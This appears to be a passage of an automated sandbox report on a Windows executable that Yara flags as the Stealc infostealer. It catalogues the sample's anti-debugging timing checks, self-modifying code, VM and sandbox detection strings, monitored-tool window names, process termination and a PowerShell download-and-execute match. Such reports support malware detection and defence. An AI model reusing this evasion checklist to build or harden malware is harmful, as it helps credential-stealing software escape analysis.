              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F4C0 second address: 89F4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F4C6 second address: 89F4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F300 second address: 89F314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B50h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F314 second address: 89F344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FBF65134596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jnp 00007FBF65134596h 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop ebx 0x00000018 jmp 00007FBF6513459Fh 0x0000001d pushad 0x0000001e jnl 00007FBF65134596h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A462 second address: 89A468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB77F second address: 8AB783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB783 second address: 8AB7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FBF65561B57h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADE35 second address: 8ADE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADE39 second address: 8ADE56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBF65561B4Ch 0x0000000e jno 00007FBF65561B46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C247B second address: 8C247F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C275C second address: 8C276D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FBF65561B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C28E8 second address: 8C28F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF651345A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2D30 second address: 8C2D35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2EAD second address: 8C2EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBF65134596h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2FE0 second address: 8C2FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBF65561B4Ch 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C74CF second address: 8C74D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7A58 second address: 8C7A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF65561B51h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C930E second address: 8C9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9314 second address: 8C9325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FBF65561B46h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9325 second address: 8C9349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBF651345A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9349 second address: 8C934D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C934D second address: 8C935D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FBF65134596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C935D second address: 8C9363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9363 second address: 8C9367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CACFD second address: 8CAD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAD06 second address: 8CAD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAD0C second address: 8CAD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C202C3 second address: 4C202FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF6513459Fh 0x00000008 jmp 00007FBF651345A8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 mov dh, 9Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 mov eax, 73B6EB5Fh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C202FB second address: 4C20323 instructions: 0x00000000 rdtsc 0x00000002 mov dh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FBF65561B57h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20323 second address: 4C20336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF6513459Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20336 second address: 4C2033A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C203A1 second address: 4C203A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C203A7 second address: 4C203AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C203AB second address: 4C203EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF6513459Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBF6513459Ch 0x00000013 or esi, 5B080FA8h 0x00000019 jmp 00007FBF6513459Bh 0x0000001e popfd 0x0000001f push esi 0x00000020 mov cx, di 0x00000023 pop ebx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov edi, ecx 0x0000002c rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62FA44 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7DAA67 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62D55E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EBD7A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27019
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25837
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003F18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003FE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003F4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003F23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003EDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003F2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003EDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003FCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003FDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003FD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003E16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003E16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00401BF0
              Source: file.exe, file.exe, 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25824
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25832
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25676
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25696
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E4A60 VirtualProtect 00000000,00000004,00000100,?0_2_003E4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00406390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406390 mov eax, dword ptr fs:[00000030h]0_2_00406390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00402A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 404, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00404610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004046A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004046A0
              Source: file.exe, file.exe, 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00402D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00402B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00402A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00402C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
